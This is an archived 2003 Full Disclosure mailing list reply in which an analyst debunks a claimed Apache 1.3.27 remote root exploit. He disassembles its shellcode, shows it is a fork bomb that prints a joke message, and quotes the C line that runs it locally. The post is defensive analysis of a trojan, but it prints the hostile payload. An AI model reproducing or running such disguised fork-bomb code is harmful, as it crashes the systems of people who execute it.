Full Disclosure mailing list archives
Re: Apache 1.3.27 Remote Root 0-Day
From: Joe Stewart <jstewart () lurhq com>
Date: Fri, 20 Jun 2003 13:04:52 -0400
On Friday 20 June 2003 11:15 am, Michael wrote:
> Maybe now we can STFU and concentrate on actual disclosure? I'm curious as to why there has been no discussion about this apache report. The poster of this message didn't include any info on the details of the problem nor an exploit, which leaves us wondering. (The insult was cute though)
There was exploit code included in the message I got. Taking apart the shellcode we see:

   0: 31 db           xor %ebx,%ebx
   2: 31 c0           xor %eax,%eax
   4: 31 d2           xor %edx,%edx
   6: b2 18           mov $0x18,%dl
   8: 68 20 3f 21 0a  push $0xa213f20   ; " ?!\n"
   d: 68 54 52 31 58  push $0x58315254  ; "TR1X"
  12: 68 65 20 4d 34  push $0x344d2065  ; "e M4"
  17: 68 73 20 54 68  push $0x68542073  ; "s Th"
  1c: 68 61 74 20 69  push $0x69207461  ; "at i"
  21: 68 2d 2d 57 68  push $0x68572d2d  ; "--Wh"
  26: 89 e1           mov %esp,%ecx     ; pointer to string
  28: b0 04           mov $0x4,%al
  2a: cd 80           int $0x80         ; syscall_write
  2c: b8 02 00 00 00  mov $0x2,%eax
  31: cd 80           int $0x80         ; syscall_fork
  33: eb f7           jmp 0x2c          ; loop
  ... garbage code follows

So, the shellcode is a fork bomb, printing "--What is The M4TR1X ?!" over and over until the system can no longer fork processes. Looking at the C code, we see this line:

  void(*b)()=(void*)shellcode;b();

Which executes the shellcode locally. In other words, don't run this.

-Joe

--
Joe Stewart, GCIH
Senior Intrusion Analyst
LURHQ Corporation
http://www.lurhq.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Apache 1.3.27 Remote Root 0-Day koec (Jun 19)
- Re: Apache 1.3.27 Remote Root 0-Day Michael (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day KF (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day Joe Stewart (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day James Greenhalgh (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day William D. Colburn (aka Schlake) (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day nikoteen (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day Matt (Jun 20)
- <Possible follow-ups>
- Re: Apache 1.3.27 Remote Root 0-Day Andreas Gietl (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day xbud (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day Michael (Jun 20)